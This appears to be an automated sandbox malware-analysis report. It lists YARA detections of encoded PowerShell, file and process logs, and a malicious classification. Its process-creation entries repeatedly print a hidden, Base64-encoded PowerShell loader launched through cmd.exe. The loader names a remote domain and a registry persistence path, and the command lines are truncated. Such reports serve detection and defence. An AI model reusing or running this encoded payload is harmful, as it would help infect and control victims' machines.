  • 0x267a:$xc1: 4A 41 42 32 41 43 41 41 50 51 41 67 41
  • 0x1c52:$xc3: 4A 41 42 73 41 44 30 41
  • 0x1dd2:$xc3: 4A 41 42 70 41 44 30 41
00000003.00000002.888152756.0000000000390000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
  • 0x3d14:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x3e44:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x29f4:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x2cf4:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000003.00000002.888245760.00000000005EB000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
  • 0x7b15:$xc1: 4A 41 42 32 41 43 41 41 50 51 41 67 41
  • 0x7bad:$xc1: 4A 41 42 32 41 43 41 41 50 51 41 67 41
  • 0x1a29c:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x1a3cc:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x7185:$xc3: 4A 41 42 73 41 44 30 41
  • 0x7305:$xc3: 4A 41 42 70 41 44 30 41
  • 0x18f7c:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x1927c:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000003.00000002.888181676.00000000003E0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
  • 0x3ec4:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x3ff4:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x6720:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x6850:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x2ba4:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x2ea4:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
  • 0x5400:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x5700:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000003.00000002.888226541.00000000005C0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
  • 0x882d:$xc1: 4A 41 42 32 41 43 41 41 50 51 41 67 41
  • 0x88c5:$xc1: 4A 41 42 32 41 43 41 41 50 51 41 67 41
  • 0x3224:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x3354:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x5a80:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x5bb0:$xc2: 4A 00 41 00 42 00 32 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41
  • 0x7e9d:$xc3: 4A 41 42 73 41 44 30 41
  • 0x801d:$xc3: 4A 41 42 70 41 44 30 41
  • 0x1f04:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x2204:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
  • 0x4760:$xc4: 4A 00 41 00 42 00 73 00 41 00 44 00 30 00 41
  • 0x4a60:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
Click to see the 4 entries

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

System Summary

barindex
Very long command line found
Source: unknownProcess created: Commandline size = 5184
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 5176
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 5165
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 5176Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 5165Jump to behavior
Source: 00000003.00000002.888389730.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888152756.0000000000390000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888245760.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888181676.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888226541.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888319048.0000000000629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: 00000003.00000002.888441908.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: Process Memory Space: powershell.exe PID: 1168, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 1168, type: MEMORYSTRMatched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_003CB2EE NtQuerySystemInformation,3_2_003CB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_003CB2CC NtQuerySystemInformation,3_2_003CB2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: classification engineClassification label: mal52.evad.win@5/2@0/0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................8.......H.......................0...............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................8.......d.......................0...............X.'.............................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................8.......m.......................0...............X.'.............8.".............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................8.......v.......................0....................... .......8.".............Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................8...............................0...............X.'.............................Jump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C "cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBl
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdg